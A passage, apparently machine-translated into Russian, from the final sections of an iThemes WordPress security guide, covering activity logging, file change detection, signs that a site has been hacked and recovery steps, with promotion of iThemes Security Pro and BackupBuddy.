Первый тип регистрируемой активности пользователя - это когда пользователи входят и выходят из вашего веб-сайта и откуда. Отслеживание времени и места входа пользователя в систему может помочь вам обнаружить пользователя, который был скомпрометирован. Этот пользователь вошел в систему в необычное время или с нового места? Если да, вы можете начать с них расследование.

2. Создание / регистрация пользователя

Следующее действие, о котором вы должны вести учет, - это создание пользователей, особенно пользователей с правами администратора. Если хакер может скомпрометировать законного пользователя, он может создать там собственного администратора в попытке скрыться. Вам легко заметить что-то странное со своей учетной записью, но гораздо сложнее определить вредоносную активность другого пользователя.

Также важен мониторинг регистрации пользователей. Некоторые уязвимости позволяют хакерам изменить новую роль пользователя по умолчанию с подписчика на администратора.

Если у вас настроено ведение журнала пользователей только для наблюдения за активностью пользователей-администраторов, в журналы безопасности будут записываться только новые регистрации пользователей-администраторов. Итак, если вы когда-либо видите недавно зарегистрированного пользователя в своих журналах безопасности, что-то пошло не так.

3. Добавление и удаление плагинов

Очень важно записывать, кто добавляет и удаляет плагины. После взлома вашего сайта злоумышленник может легко добавить свой собственный плагин для внедрения вредоносного кода на сайт.

Даже если у хакера нет доступа к вашему серверу или базе данных, он все равно сможет вносить в них изменения с вашей панели управления WordPress. Используя плагин, они могут добавить перенаправления на ваш сайт для использования в своей следующей кампании по рассылке спама или внедрить вредоносное ПО в вашу базу данных. После выполнения своего вредоносного кода они могут удалить плагин, чтобы удалить доказательства своего преступления. К счастью для нас, мы не пропустим ничего из этого, потому что все это было задокументировано в наших журналах безопасности WordPress.

4. Переключение тем

Еще одна активность пользователя, отслеживаемая iThemes Security Pro User Logging, - это когда кто-то переключает тему веб-сайта. Если вы когда-нибудь обнаружите, что ваша тема неожиданно изменилась, вы можете посмотреть в журналах безопасности WordPress, чтобы узнать, кто внес это изменение.

5. Изменения в сообщениях и страницах

Наконец, вы хотите отслеживать любые изменения в своем сообщении и страницах. Были ли добавлены ссылки для отправки вашего трафика на другие сайты? Мониторинг сообщений и страниц может помочь вам найти любые неловкие страницы или вредоносные ссылки, добавленные на ваш сайт после взлома.

Чтобы узнать, какое сообщение было изменено, щелкните ссылку « Просмотреть подробности», чтобы найти идентификатор сообщения.

Ознакомьтесь с обзором функции «Ведение журнала», чтобы узнать больше о том, как мониторинг активности пользователей может помочь вам вернуться после взлома.

Заключение

Недостаточное ведение журнала - одна из 10 основных угроз безопасности веб-приложений OWASP. Мониторинг правильного поведения поможет вам выявлять и останавливать атаки, обнаруживать нарушение, а также получать доступ и устранять ущерб, нанесенный вашему веб-сайту после успешной атаки.

Раздел 10: Когда происходит сбой в системе безопасности WordPress

Даже если вы будете следовать рекомендациям по обеспечению безопасности WordPress, все равно существует вероятность взлома вашего сайта. Компрометация означает, что хакер взломал ваш сайт и заразил его вредоносным ПО.

Что такое нарушение безопасности?

Нарушение безопасности - это когда киберпреступник может получить несанкционированный доступ к вашему сайту или серверу. Нарушения безопасности могут происходить по-разному, поскольку хакеры используют некоторые из наиболее распространенных проблем безопасности WordPress. От запуска устаревших версий плагинов и тем до более сложных SQL-инъекций - нарушение безопасности может произойти даже с самыми бдительными владельцами сайтов.

Время обнаруживать нарушение безопасности: ключевой фактор очистки зараженного веб-сайта

Знаете ли вы, что среднее время, необходимое для обнаружения взлома веб-сайта, составляет 200 дней? К сожалению, чем дольше вы заметите нарушение, тем больший ущерб хакер может нанести вашему сайту, вашим клиентам и вам. Вредоносная программа может нанести ошеломляющий ущерб за 200 дней. Вот почему так важно сократить время, необходимое для обнаружения нарушения безопасности.

Почему? Время очистки и простоя, которое вам понадобится для очистки вашего веб-сайта после 200 дней ущерба, также ошеломляет. Время на исследование всего, что затронуло вредоносное ПО и данные о том, какие данные клиентов были украдены, только увеличивается, в то время как нарушение остается незамеченным. Не говоря уже о времени, которое вам придется потратить на информирование клиентов о том, что им необходимо аннулировать свои кредитные карты, потому что хакер регистрировал все их нажатия клавиш, когда они посещали ваш веб-сайт.

Цена взлома велика. Вы должны кому-то заплатить, чтобы расследовать нарушение и очистить ваш веб-сайт. Специалист по восстановлению взлома должен будет отключить ваш сайт, пока он работает, и люди не смогут совершать новые покупки, пока ваш сайт не работает. Потеряв доверие клиентов, вы, скорее всего, потеряете любые будущие покупки, которые они вам подарили.

Стоимость взлома - вот почему так важно замечать нарушение как можно скорее. Чем быстрее вы обнаружите нарушение, тем быстрее вы сможете предотвратить дальнейший ущерб и тем быстрее вы сможете вернуть свой веб-сайт и бизнес в онлайн.

Достаточно ли сканеров вредоносных программ?

Сканеры вредоносных программ позволяют сканировать ваш сайт WordPress на предмет известных вредоносных файлов и скриптов. Но достаточно ли сканеров вредоносных программ, чтобы обнаружить брешь в системе безопасности?

Одним словом, нет. Не думайте, что вы можете полагаться только на сканер вредоносных программ, чтобы проверить, заражен ли ваш сайт. Ни один сканер вредоносных программ не может идентифицировать все существующие вредоносные программы. Если вы встретите сканер вредоносных программ, который утверждает, что он на 100% точен, вам следует запустить его, потому что сканирование, которое делает подобные утверждения, часто наименее точны.

Подпись и обнаружение поведенческого вредоносного ПО

Большинство программ сканирования на наличие вредоносных программ и антивирусного программного обеспечения используют сигнатуры вредоносных программ для обнаружения вредоносных программ. Более продвинутое сканирование вредоносных программ будет использовать комбинацию обнаружения сигнатур и поведенческого анализа.

Сигнатуры вредоносных программ

Сигнатура вредоносного ПО - это серия байтов, которые используются для идентификации известных частей вредоносного ПО. Некоторые сканеры вредоносных программ работают на базе базы данных, содержащей сигнатуры миллионов известных вирусов.

Сканирование вредоносных программ на основе сигнатур выполняется быстро, просто и позволяет обнаружить 100% известных и хорошо изученных вредоносных программ. Все это здорово и поможет отловить вредоносное ПО, добавленное хакерами низкого уровня.

Однако опытные хакеры знают, что сканеры вредоносных программ проверяют сигнатуры известных вредоносных программ. Эти хакеры имеют возможность скрывать сигнатуры вредоносных программ, чтобы их не обнаружил обычный сканер.

Новые вредоносные программы выпускаются с такой скоростью, что сканеры вредоносных программ не могут обновлять свои базы данных всеми последними сигнатурами. Таким образом, сканер на основе сигнатур не сможет отличить новую вредоносную программу от файла readme.txt плагина.

Поведенческий анализ

Поведенческий анализ проверяет действия программного обеспечения, чтобы определить, является ли оно вредоносным. Существует множество различных типов поведения, которые можно считать подозрительными или злонамеренными. Например, iThemes Security Pro Site Scan использует API безопасного просмотра Google для обеспечения безопасности веб-сайтов. Google Safe Browsing проверит, перенаправляет ли какое-либо программное обеспечение трафик на известный вредоносный сайт.

Опять же, не существует надежного метода обнаружения вредоносных программ. Но сочетание поведенческих проверок и проверок подписей значительно увеличит ваши шансы быть предупрежденными о доказательствах нарушения безопасности.

Какое поведение распространяется на все вредоносные программы?

Мы знаем, насколько важно как можно скорее обнаружить брешь в системе безопасности, и что полагаться только на обнаружение вредоносных программ недостаточно. Поэтому мы задались вопросом, как iThemes Security Pro может сократить время, необходимое людям для обнаружения нарушений безопасности на своих веб-сайтах?

Хотя типы вредоносных программ, наносящих ущерб вашему веб-сайту, сильно различаются, их действия можно свести к одному или к комбинации следующих трех вещей.

1. Добавить файлы. Вредоносное ПО в виде шпионского ПО может добавить вредоносный файл, который будет записывать нажатия клавиш вашего клиента при вводе данных своей кредитной карты.
2. Удалить файлы - некоторые вредоносные программы удаляют законный файл и заменяют его вредоносным файлом с тем же именем.
3. Изменить файлы. Вредоносное ПО будет пытаться скрыть свой вредоносный код, пряча его в существующем файле, который оно изменяет.

Разве не было бы неплохо получать уведомления о неожиданных изменениях на вашем веб-сайте, чтобы вы могли проверить их на наличие признаков нарушения безопасности?

Как сократить время, необходимое для обнаружения нарушения безопасности

Ключом к быстрому обнаружению нарушения безопасности является отслеживание изменений файлов на вашем веб-сайте.

Функция обнаружения изменений файлов в iThemes Security Pro будет сканировать файлы вашего веб-сайта и предупреждать вас, когда на вашем веб-сайте происходят изменения.

Есть несколько законных причин, по которым вы можете увидеть новые действия по изменению файлов в своих журналах, но если внесенные изменения были неожиданными, вам следует уделить время, чтобы убедиться, что изменения не были вредоносными. Например, если вы видите изменение, внесенное в плагин в тот же день и в то же время, когда вы обновляли плагин, не будет причин для расследования.

Как включить обнаружение изменений файлов в iThemes Security Pro

Чтобы начать мониторинг изменений файлов, включите обнаружение изменений файлов на главной странице настроек безопасности.

После включения обнаружения изменения файлов iThemes Security Pro начнет сканирование всех файлов вашего веб-сайта по частям . Сканирование файлов по частям поможет сократить ресурсы, необходимые для отслеживания изменений файлов.

Первоначальное сканирование изменений файлов создаст индекс файлов вашего веб-сайта и их хэшей. Хеш файла - это сокращенная, нечитаемая человеком версия содержимого файла.

После завершения первоначального сканирования iThemes Security Pro продолжит сканирование вашего файла по частям. Если хеш файла изменяется при одном из последующих сканирований, это означает, что содержимое файла изменилось.

Вы также можете запустить изменение файла вручную, нажав кнопку Сканировать файлы сейчас в настройках обнаружения изменения файлов.

Активация уведомлений об изменении файла по электронной почте

Изменения в файлах происходят постоянно, и получение уведомлений по электронной почте о каждом изменении быстро станет ошеломляющим. И прежде чем вы это узнаете, он становится мальчиком, который кричал о ситуации волка, и вы начинаете полностью игнорировать предупреждения об изменении файла.

Давайте посмотрим, как iThemes Security Pro интеллектуально определяет законные изменения, чтобы уменьшить количество уведомлений, и как вы можете отключить уведомления для файлов, которые, как ожидается, будут часто обновляться.

Вы можете управлять всеми уведомлениями iThemes Security из Центра уведомлений в подключаемом модуле iThemes Security. На панели управления администратора WordPress перейдите в раздел « Безопасность»> «Настройки» и найдите модуль « Центр уведомлений ».

Как iThemes Security Pro определяет допустимые изменения файлов

Существует несколько способов, с помощью которых iThemes Security Pro может определить, было ли изменение, внесенное в файл, законным, а не причиной для беспокойства. iThemes Security Pro не будет создавать уведомление об изменении файла для изменений, которые он может проверить.

1. Обновления плагинов / тем, завершенные системой управления версиями.

Функция управления версиями в iThemes Security Pro позволяет автоматически обновлять WordPress, плагины и темы.

Если обновление завершено системой управления версиями, iThemes Security Pro будет знать источник обновления и не будет запускать предупреждение.

2. Сравнение файлов плагинов и тем iThemes

Установите флажок « Сравнить файлы в Интернете» в настройках «Обнаружение изменений файлов», чтобы включить сравнение файлов в интерактивном режиме.

Каждый раз, когда файл на вашем веб-сайте, принадлежащий плагину или теме iThemes, изменяется, он сравнивается с файлом на сервере iThemes. Если хеш версии файла на вашем веб-сайте совпадает с хешем версии на сервере iThemes, это будет законное изменение, и вы не получите предупреждения.

3. Сравнение файлов WordPress.org в Интернете

Если основной файл WordPress или плагин, установленный из репозитория WordPress.org, изменяется, файл будет сравниваться с версией на WordPress.org. Если хеши совпадают, изменения не являются вредоносными, и вы не получите предупреждения.

4. Исключения вручную

Вы можете исключить файлы, каталоги и типы файлов из функции обнаружения изменений файлов в настройках обнаружения изменений файлов.

Общее правило - это нормально исключать файлы, которые, как вы знаете, будут регулярно обновляться. Файлы резервных копий и кеш-файлов являются прекрасным примером этого. Исключение этих типов файлов снимет лишний шум.

7 признаков взлома вашего сайта WordPress

Вы спрашиваете себя: « Мой сайт WordPress взломан? »Означает, что вам нужны быстрые ответы.

Чем быстрее вы заметите признаки взлома веб-сайта, тем быстрее вы сможете очистить свой сайт. Чем быстрее вы очистите свой веб-сайт, тем меньше вреда для него может нанести взлом.

1. Ваша домашняя страница отличается

Изменения на вашей домашней странице кажутся очевидным признаком. Но сколько раз вы на самом деле тщательно проверяете свою домашнюю страницу? Я знаю, что обычно перехожу прямо к своему URL-адресу для входа, а не к своему домашнему URL-адресу. Оттуда я вхожу в систему, обновляю свой сайт или редактирую сообщение. Закончив то, для чего пришел, я часто ухожу, не заглянув на главную страницу своего сайта.

Основная цель некоторых хаков - троллить сайт или получить известность. Таким образом, они только меняют вашу домашнюю страницу на то, что им кажется забавным, или оставляют взломанную по визитной карточке.

Если вы заметили изменение на своей домашней странице, вы можете быстро и легко восстановить свой веб-сайт, используя файл резервной копии, созданный с помощью надежного плагина резервного копирования WordPress, такого как BackupBuddy.

2. Производительность вашего веб-сайта упала

Ваш сайт может работать медленно, если на нем есть инфекция. Вы можете столкнуться с замедлением работы вашего веб-сайта, если вы подвергаетесь атакам методом грубой силы или если есть вредоносный скрипт, использующий ресурсы вашего сервера для майнинга криптовалюты. Точно так же DDoS (или атака отказа в обслуживании ) происходит, когда сеть IP-адресов одновременно отправляет запросы на ваш веб-сайт, пытаясь вызвать его сбой.

3. Ваш веб-сайт содержит всплывающие окна со спамом или вредоносными программами.

Если посетители увидят всплывающие окна, перенаправляющие их на вредоносный веб-сайт, есть большая вероятность, что хакер взломал ваш веб-сайт. Цель этого типа атаки - отвести трафик с вашего сайта на сайт злоумышленника, чтобы они могли нацеливать пользователей на мошенничество с кликами для рекламы с оплатой за клик.

Самое неприятное в этом типе взлома - вы не можете видеть всплывающие окна. Всплывающее окно может быть спроектировано так, чтобы оно не показывалось зарегистрированным пользователям, что снижает вероятность того, что владельцы веб-сайтов увидят их. Таким образом, даже когда владелец сайта выходит из системы, всплывающие окна никогда не отображаются.

Ваш просмотр всплывающих окон также может быть ограничен, если вы используете расширение для блокировки рекламы в своем браузере. Например, клиент сообщил о взломе всплывающих окон и поделился скриншотами и видео всплывающих окон. После того, как я часами просматривал их веб-сайт, я не смог воссоздать ничего, о чем они сообщали. Я был уверен, что взломан их персональный компьютер, а не сайт.

Наконец, меня осенило, почему я не вижу всплывающих окон. Я установил в свой браузер расширение adblocker. Как только я отключил расширение для блокировки рекламы, я смог видеть всплывающие окна повсюду. Я делюсь этой позорной историей, чтобы, надеюсь, спасти вас от той же ошибки.

4. Вы замечаете снижение посещаемости веб-сайта.

Если вы войдете в свою учетную запись Google Analytics и заметите резкое снижение посещаемости веб-сайта, ваш сайт WordPress может быть взломан. Падение посещаемости сайта заслуживает расследования. На вашем сайте может быть вредоносный скрипт, который перенаправляет посетителей с вашего сайта, или Google уже может внести ваш сайт в черный список как вредоносный.

Первое, на что вы хотите обратить внимание, - это исходящий трафик вашего сайта. Отслеживая свой веб-сайт с помощью Google Analytics, вам нужно будет настроить свой сайт для отслеживания трафика, покидающего ваш сайт. Самый простой способ отслеживать исходящий трафик на вашем сайте WordPress - использовать плагин WordPress Google Analytics.

6. Неожиданные новые пользователи

Если на вашем веб-сайте появляются неожиданные регистрации новых пользователей-администраторов, это еще один признак того, что ваш сайт WordPress был взломан. С помощью эксплойта скомпрометированного пользователя злоумышленник может создать нового пользователя с правами администратора. Обладая новыми правами администратора, хакер готов нанести серьезный ущерб вашему сайту.

Помните предыдущий плагин WP GDPR Compliance? В ноябре 2018 года у нас было несколько отчетов о создании новых пользователей-администраторов на сайтах клиентов. Хакеры использовали уязвимость в плагине WP GDPR Compliance (уязвимость исправлена ​​в версии 1.4.3) для создания новых пользователей-администраторов на сайтах WordPress, на которых запущен плагин. Эксплойт плагина позволял неавторизованным пользователям изменять регистрацию пользователя, чтобы изменить роль нового пользователя по умолчанию с подписчика на администратора. К сожалению, это была не единственная уязвимость, и вы не можете просто удалить новых пользователей, созданных злоумышленником, и исправить плагин.

Если у вас были установлены WP GDPR Compliance и WooCommerce, на ваш сайт мог быть внедрен вредоносный код. Злоумышленники могут использовать фоновый установщик плагина WooCommerce для вставки установщика бэкдора в базу данных. Если на вашем сайте установлен бэкдор, вам следует обратиться к специалисту по восстановлению взлома. Другой вариант - использовать файл резервной копии, чтобы вернуться к копии вашего веб-сайта до взлома с использованием предыдущей резервной копии.

7. Удалены пользователи с правами администратора.

Если вы не можете войти на свой сайт WordPress даже после сброса пароля, это может быть серьезным признаком заражения.

Когда репозиторий Gentoo Github был взломан, первым делом злоумышленник удалил всех пользователей-администраторов. Так как же этот хакер вообще попал в их аккаунт Github? Пароль администратора Gentoo был обнаружен на другом сайте. Я предполагаю, что имя пользователя и пароль были обнаружены либо путем парсинга, либо путем дампа базы данных.

Несмотря на то, что пароль администратора для их учетной записи Gentoo Github отличался от пароля, который использовался для взломанной учетной записи, он был очень похож. Это будет похоже на то, как я использую iAmAwesome2020 в качестве пароля для одной учетной записи и iAmAwesome2021 на другом сайте. Таким образом, хакеры смогли вычислить пароль с небольшими усилиями. Как мы видим, вы должны использовать уникальный пароль для каждой учетной записи. Простого изменения паролей недостаточно. Используя LastPass, вы можете создавать и безопасно хранить надежные уникальные пароли для каждого сайта.

Как вернуться из беды

Если вы подозреваете, что произошло нарушение, вы можете предпринять несколько быстрых шагов, чтобы уменьшить ущерб.

Восстановить предыдущую / чистую резервную копию вашего сайта

Самый надежный способ устранить нарушение безопасности - это восстановить ваш сайт до предыдущей версии до атаки. Вот почему так важно иметь комплексное решение для резервного копирования WordPress. Мы рекомендуем использовать BackupBuddy для автоматического запуска резервного копирования, чтобы у вас всегда была резервная копия.

Просто обратите внимание, что восстановление предыдущей резервной копии может по-прежнему сделать ваш сайт уязвимым для того же нарушения, поэтому важно также выполнить следующие действия.

Немедленно обновите все устаревшие плагины и темы

Уязвимый плагин или тема по-прежнему могут быть виновником, поэтому важно НЕМЕДЛЕННО обновить все устаревшие плагины или темы. Даже если вы восстановите предыдущую чистую версию своего веб-сайта, те же уязвимости все равно будут существовать, и их можно будет снова взломать.

Вы также можете проверить, не запущен ли у вас уязвимый плагин или тема, для которой не установлен патч от разработчика. Вам нужно будет немедленно удалить этот плагин.

Включить двухфакторную аутентификацию

Если вы не используете двухфакторную аутентификацию для защиты входа в систему администратора, немедленно активируйте ее. Этот дополнительный уровень безопасности поможет гарантировать, что неавторизованные пользователи не смогут взломать какие-либо учетные записи администратора.

Обратитесь за помощью для профессионального удаления вредоносных программ

Нарушения безопасности WordPress происходят на уровне сервера (глубже, чем ваша установка WordPress), поэтому вам может потребоваться обратиться в профессиональную службу удаления вредоносных программ. Мы рекомендуем WeWatchYourWebsite для профессионального удаления вредоносных программ.

Заключение: полное руководство по безопасности WordPress

В этом руководстве по безопасности WordPress мы МНОГОЕ рассмотрели! Но, следуя советам этого руководства, вы заблокируете почти 100% атак, совершаемых на ваш сайт.

Плагин безопасности WordPress может помочь защитить ваш сайт WordPress

В сочетании со знанием тем о безопасности WordPress в этом руководстве плагин безопасности WordPress может помочь защитить ваш веб-сайт WordPress. iThemes Security Pro, наш плагин безопасности WordPress, предлагает более 50 способов защиты и защиты вашего сайта от распространенных уязвимостей безопасности WordPress. С помощью WordPress, двухфакторной аутентификации, защиты от перебора паролей, надежного применения пароля и многого другого вы можете добавить дополнительный уровень безопасности на свой веб-сайт.

Майкл Мур

Каждую неделю Майкл составляет отчет об уязвимостях WordPress, чтобы обеспечить безопасность ваших сайтов. Как менеджер по продукту в iThemes, он помогает нам продолжать улучшать линейку продуктов iThemes. Он большой ботаник и любит узнавать обо всем, что есть в технологиях, старом и новом. Вы можете увидеть, как Майкл гуляет с женой и дочерью, читает или слушает музыку, когда не работает.